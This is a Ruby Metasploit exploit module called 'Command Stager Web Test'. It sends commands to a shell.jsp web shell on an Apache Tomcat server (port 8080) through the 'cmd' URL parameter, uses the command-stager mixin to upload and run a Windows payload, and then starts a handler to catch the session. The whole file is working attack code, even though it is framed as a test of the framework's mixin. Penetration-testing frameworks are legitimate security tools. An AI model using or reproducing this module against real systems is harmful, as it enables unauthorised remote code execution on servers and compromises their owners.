##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking
  # =( need more targets and perhaps more OS specific return values OS specific would be preferred

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'	      => 'Command Stager Web Test',
      'Description'  => %q{
          This module tests the command stager mixin against a shell.jsp application installed
        on an Apache Tomcat server.
      },
      'Author'	=> 'bannedit',
      'References' =>
        [
        ],
      'DefaultOptions' =>
        {
        },
      'Payload' =>
        {
        },
      'Platform' => 'win',
      'Privileged' => true,
      'Targets' =>
        [
          # need more but this will likely cover most cases
          [ 'Automatic Targeting',
            {
              'auto' => true
            }
          ],
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Feb 03 2010'))

    register_options(
      [
        Opt::RPORT(8080),
      ], self.class)
  end

  def autofilter
    false
  end


  # This is method required for the CmdStager to work...
  def execute_command(cmd, opts)
    uri = opts[:uri]
    http_hash = {
      'uri' => uri.gsub(/CMDS/, Rex::Text.uri_encode(cmd))
    }
    resp = send_request_raw(http_hash, 5)
  end

  def exploit

    opts = {
      :delay => 0.5,
      :uri => "/shell/shell.jsp?cmd=CMDS"
    }

    execute_cmdstager(opts)

    handler

  end

end
